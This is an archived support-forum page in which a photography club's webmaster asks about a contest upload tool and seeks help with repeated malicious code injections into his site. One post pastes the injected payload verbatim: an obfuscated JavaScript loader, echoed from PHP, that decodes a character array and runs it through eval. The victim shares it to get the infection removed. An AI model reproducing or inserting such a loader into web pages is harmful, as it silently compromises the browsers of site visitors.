Community @ The Turning Gate

Support community for TTG plugins and products.

NOTICE

The Turning Gate's Community has moved to a new home, at https://discourse.theturninggate.net.

This forum is now closed, and exists here as a read-only archive.

  • New user registrations are disabled.
  • Users cannot create new topics.
  • Users cannot reply to existing topics.

You are not logged in.

#1 General » Any plans or suggestions for client upload feature? » 2015-05-02 06:17:58

ksseelye
Replies: 3

Hi Matt and Rod....
I have a TTG based website for my community photography club now for several years.  One of the features our members enjoy is a monthly photo contest.  In the past the process has been that the members needed to send through email their photo entry and I would have to import them into my lightroom and publish them to a CRG and then use the feedback option to allow members to vote on the photo they think is best.  This was manageable when the club was small but over the past two years the club has grown to close to 100 members.  I credit this growth to the website as they did not have one before I and TTG came along. Thank you by the way.  I was hoping you could help me with a contest software solution that works well with your plugins.  I have tried a  php solution that uses codeignitor as its framework and had a bit of trouble injecting it into my site along with the TTG plugins so I set up a new domain to host it and linked it to our site.  Unfortunately it was crap.  Uploaded photos were distorted and un-sharp.  I need to replace it and was hoping you could offer some direction to a suitable solution.  I was hoping for a way for members to upload photos to a specific advertised contest and then have other members with the ability to vote on those photos.  I will include the contest page I have now as it has all of the features I am looking for but the photo display is just horrible and that discourages participation. I am a huge fan of your work and value your opinion greatly.

www.apsphotocontest.org

Oh by the way I am giving a website building workshop for the club members on May 23rd so expect a mad rush on plugin purchases.  We have about 25 members signed up right now.  I will be teaching them the basic pages set up, CRG and publisher.  I can only anticipate more workshops on the other plugins in the future.  You make it so easy for us photographers and we are forever grateful.

Thank you
Ken Seelye

#2 Re: General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 22:07:57

The current site is antietamphotographicsociety.org in case you want to take a look.

#3 Re: General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 22:03:55

I do have a .htaccess file and it usually is unchanged when the code is injected so I am thinking that it is unrelated to the injections.  But I may be wrong.  Below you will see the code that is injected into alomost every index.php page and html page.  The template.php are also infected which I believe is used to propagate the code to all the pages. Any help you can provide would be greatly appreciated.


#336988#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  echo "                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                                                                  try{window.document.body++}catch(gdsgsdg){dbshre=241;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,99,92,96,97,26,56,23,92,104,93,112,100,93,103,110,41,90,106,94,91,111,92,61,101,95,104,92,102,109,34,34,96,94,107,91,104,92,31,34,53,8,1,5,3,26,27,23,24,97,95,99,95,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,90,104,108,95,92,89,110,114,41,90,90,90,40,107,99,39,91,105,109,91,93,90,111,115,38,108,107,91,97,37,104,97,106,34,50,5,3,26,27,23,24,97,95,99,95,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,96,94,98,99,37,107,109,115,103,92,38,97,95,100,94,96,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,98,96,95,96,39,109,111,112,100,94,40,114,96,92,109,98,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,99,92,96,97,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,95,93,97,98,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,95,93,97,98,87,30,54,53,41,95,96,110,55,33,36,50,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,94,93,109,63,103,92,101,94,104,111,57,113,66,94,35,30,96,94,98,99,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,95,93,97,98,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s=\"\";for(i=0;i-490!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[]-(i%5-5-4));}z=s;e(s);}</script>";

#/336988#

#4 General » Cross-Site Scripting (Stop the Madness.... Please) » 2013-04-14 11:42:59

ksseelye
Replies: 6

Hi guys, I have been chosen to handle our local photography clubs website.  I love all the plugins that TTG has available and have purchased what I think is all of them except the shopping cart.  I created the site about 6 months ago and shortly after publishing the site I was notified by Google that my site was infected.  I searched the code on the site and found almost every index.php and html page was infected with suspicious code.  I cleaned the site and a few days later it was back.  I have implemented key captcha on all the registration forms for the blog and forum.  I have implemented site scan from Go Daddy and they keep informing me that my vulnerability is Cross-site scripting.  After some research I found this is exactly what is happening to my site.  Malicious code is being injected into all my pages which often times gets flagged by Google, or personal virus protections on members computers are alerting them of a malicious site and blocking it.  My question or at this stage of the game, my Plea for help, is what can be done with the plugins to shut down this vulnerablility with a site that was built on TTG plugins.  I have no hair left due to trying to stop this from happening.  My current plugins include, CE2 & CE3 Pages, CE2 & CE3 Auto Index, CE2 & CE3 Client Response Gallery, CE3 Publisher, CE2 Stage, and CE2 Theme for WordPress.  Please stop the Madness, I am spending way to much time uploading clean code.  Thank you in advance.

Board footer

Powered by FluxBB